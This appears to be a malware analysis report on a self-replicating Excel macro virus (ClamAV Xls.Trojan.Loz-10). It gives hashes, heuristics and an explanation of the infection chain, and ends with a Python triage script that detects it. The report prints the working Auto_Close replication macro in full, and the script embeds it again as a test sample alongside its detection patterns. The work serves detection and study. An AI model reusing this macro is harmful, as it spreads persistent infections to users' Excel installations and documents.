Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6b207b4c5b082cc5…

MALICIOUS

Office (OLE)

Size: 17.5 KB
Created: 2001-01-07 12:41:10
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: f2eb93f29356108cb58a5934fa27ef48
SHA-1: 8ea76b8659d1d1a2247e76746890a6ade7510b64
SHA-256: 6b207b4c5b082cc5b6f647800ca2f674c48b4f900185081b713a7e2e802178bd
Risk score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The file is an Excel workbook whose ThisWorkbook module (named Tento_sešit, the Czech Excel default; the List1 to List3 sheet modules, Czech for Sheet1 to Sheet3, carry no code) holds an Auto_Close macro, so the code runs every time the workbook is closed. Despite the name, 'c:\loz.dll' is not a DLL: the macro uses the VBE object model to export the VBA component 'IT' to that path as VBA source text (VBComponents("IT").Export) and then imports the file back into the active workbook with VBComponents.Import unless a component named 'LMD' is already present. For persistence it checks whether '<Excel user name>.xlm' exists in Application.StartupPath (Excel's XLSTART folder, whose files Excel opens at every launch); if not, it creates a new workbook, saves it there under that name, imports the same exported module into it and saves again. Finally it saves the active workbook, so the infection is written back into the document being closed. This is classic macro-virus self-replication with Office-startup persistence (the behaviour ATT&CK catalogs as T1137.001, Office Template Macros), not execution of a dropped DLL. Two caveats for triage: the whole chain runs under On Error Resume Next and depends on 'Trust access to the VBA project object model' being enabled in Excel's Trust Center, otherwise the Application.VBE and VBProject calls fail silently; and neither an 'IT' nor an 'LMD' component appears in the extracted macro source shown below, so the replicated payload itself is not visible in this artifact. The ClamAV detection 'Xls.Trojan.Loz-10' and the macro's own comments (Russian, stored as Windows-1251 text and mis-rendered through a Central European code page in the raw artifact), which describe checking for 'our copy' in the startup directory and 'injecting ourselves' into the created document, confirm the intent.

Heuristics (2)

  • VBA macros detected (medium; 1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro (high) OLE_VBA_AUTOCLOSE
    Auto_Close macro: a procedure Excel runs automatically when the workbook is closed

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  2743 bytes
SHA-256: e8ba362007cac05a59b32e3438da320ba8ee4b1947b3fa87c6c3d198b287df27
Detection
ClamAV: Xls.Trojan.Loz-10
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script (comments translated from Russian; in the raw artifact they are Windows-1251 text mis-rendered through a Central European code page)
Attribute VB_Name = "Tento_sešit"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Auto_Close()
'activation on closing documents
On Error Resume Next
If Dir(Application.StartupPath + "\" & Application.UserName & ".xlm") = Application.UserName & ".xlm" Then p = True
'check whether our copy is in the startup directory
Application.VBE.ActiveVBProject.VBComponents("IT").Export "c:\loz.dll"
'if the file is found in the startup directory, export the code to the file c:\loz.dll
For I = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(I).Name = "LMD" Then t = True
'check whether our module is in the document
Next I
If t = False Then
'if not
With ActiveWorkbook.VBProject
With .VBComponents.Import("c:\loz.dll")
'then import the code from the file "c:\loz.dll"
End With
End With
End If
If p = False Then
'if there are no copies of our code in the startup directory
Workbooks.Add.SaveAs Filename:=Application.StartupPath + "\" & Application.UserName & ".xlm"
'create an empty document in the startup directory
With ActiveWorkbook.VBProject
With .VBComponents.Import("c:\loz.dll")
'and inject ourselves into the created document
End With
End With
Workbooks(Application.UserName & ".xlm").Save
'save the document in the startup directory
End If
ActiveWorkbook.Save
'save the active document
End Sub



Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
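As an added example that is not part of this report or of oletools, the Python script below shows the static check a triage pipeline would run over a decoded VBA artifact such as the macros.bas above: split the dump into modules on the VB_Name attribute lines, strip VBA comments so comment text cannot trigger a match, and flag the full self-replication chain (an auto-exec entry point, VBComponents Export/Import through the VBE object model, and a path under Application.StartupPath) rather than any single indicator. The sample inputs are constructed for the example: the first is the Auto_Close routine from the report with its comments translated and the ThisWorkbook module renamed from Tento_sešit to its English name, the second a benign macro that only formats cells and saves. The indicator names and verdict strings are the example's own, not olevba's.

```python
import re

# Procedure names Excel and Word invoke on their own, without user interaction.
AUTO_EXEC = {"auto_open", "auto_close", "auto_exec", "autoopen", "autoclose", "autoexec",
             "workbook_open", "workbook_beforeclose", "document_open", "document_close"}

# Indicator patterns, evaluated on code with VBA comments removed (names are this example's own).
INDICATORS = {
    "vbe_object_model": re.compile(r"\.VBE\b|\bVBProject\b|\bVBComponents\b", re.I),
    "module_export": re.compile(r"\bVBComponents\s*\([^)]*\)\s*\.\s*Export\b", re.I),
    "module_import": re.compile(r"\bVBComponents\s*\.\s*Import\s*\(", re.I),
    "startup_path": re.compile(r"\bApplication\.StartupPath\b", re.I),
    "save_workbook": re.compile(r"\.(?:SaveAs|Save)\b", re.I),
}
REPLICATION_CHAIN = {"module_export", "module_import", "startup_path"}
VERDICTS = ["no auto-exec macro", "auto-exec macro",                 # least severe first
            "auto-exec macro touching the VBA project",
            "self-replicating macro (XLSTART persistence)"]
MODULE_SPLIT = re.compile(r'(?m)^Attribute VB_Name = "([^"]*)"')
PROC_DEF = re.compile(r"(?im)^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)")
WIN_PATH = re.compile(r'"([A-Za-z]:\\[^"]+)"')


def strip_comment(line: str) -> str:
    """Drop a trailing ' comment, tracking quotes so an apostrophe inside a string survives."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line


def split_modules(src: str) -> dict:
    """Map module name -> body, using the VB_Name attribute line olevba emits per module."""
    parts = MODULE_SPLIT.split(src)  # [preamble, name1, body1, name2, body2, ...]
    return {parts[i]: parts[i + 1] for i in range(1, len(parts) - 1, 2)}


def scan_module(body: str) -> dict:
    """Triage one module: auto-exec entry points, indicator hits, literal Windows paths, verdict."""
    code = [strip_comment(ln) for ln in body.splitlines()]
    joined = "\n".join(code)
    procs = PROC_DEF.findall(joined)
    auto_exec = sorted(p for p in procs if p.lower() in AUTO_EXEC)
    hits = {name: [ln.strip() for ln in code if rx.search(ln)] for name, rx in INDICATORS.items()}
    hits = {name: lines for name, lines in hits.items() if lines}
    if auto_exec and REPLICATION_CHAIN <= set(hits):      # the full macro-virus chain
        verdict = VERDICTS[3]
    elif auto_exec and "vbe_object_model" in hits:        # touches the project, no persistence
        verdict = VERDICTS[2]
    else:
        verdict = VERDICTS[1] if auto_exec else VERDICTS[0]
    return {"procedures": procs, "auto_exec": auto_exec, "indicators": hits,
            "paths": sorted(set(WIN_PATH.findall(joined))), "verdict": verdict}


def scan_vba(src: str) -> dict:
    """Triage a whole decoded VBA dump; the overall verdict is the most severe module verdict."""
    modules = {name: scan_module(body) for name, body in split_modules(src).items()}
    overall = max((m["verdict"] for m in modules.values()), key=VERDICTS.index, default=VERDICTS[0])
    return {"modules": modules, "verdict": overall}


# Constructed sample: the Auto_Close routine from the report, comments translated,
# ThisWorkbook renamed from Tento_sešit, sheet modules reduced to one.
SAMPLE_LOZ = r'''Attribute VB_Name = "ThisWorkbook"
Sub Auto_Close()
'activation on closing documents
On Error Resume Next
If Dir(Application.StartupPath + "\" & Application.UserName & ".xlm") = Application.UserName & ".xlm" Then p = True
Application.VBE.ActiveVBProject.VBComponents("IT").Export "c:\loz.dll"
For I = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(I).Name = "LMD" Then t = True
Next I
If t = False Then
With ActiveWorkbook.VBProject
With .VBComponents.Import("c:\loz.dll")
'then import the code from the file "c:\loz.dll"
End With
End With
End If
If p = False Then
Workbooks.Add.SaveAs Filename:=Application.StartupPath + "\" & Application.UserName & ".xlm"
With ActiveWorkbook.VBProject
With .VBComponents.Import("c:\loz.dll")
End With
End With
Workbooks(Application.UserName & ".xlm").Save
End If
ActiveWorkbook.Save
End Sub
Attribute VB_Name = "List1"
'''

# Constructed benign sample: saves the workbook but never touches the VBA project.
SAMPLE_BENIGN = r'''Attribute VB_Name = "Module1"
Sub FormatReport()
    Range("A1:D1").Font.Bold = True
    ActiveWorkbook.Save
End Sub
'''

if __name__ == "__main__":
    for label, src in (("report sample", SAMPLE_LOZ), ("benign sample", SAMPLE_BENIGN)):
        print(f"{label}: {scan_vba(src)['verdict']}")
```

Run it as a script to print both verdicts, or import scan_vba and feed it olevba's decoded output. Matching on the whole chain is deliberate: Save and SaveAs are common in legitimate automation, and Auto_Close by itself only earns the medium and high heuristic scores the report shows; the combination of an auto-exec entry point with VBE object-model Export/Import into the startup folder is what distinguishes a macro virus.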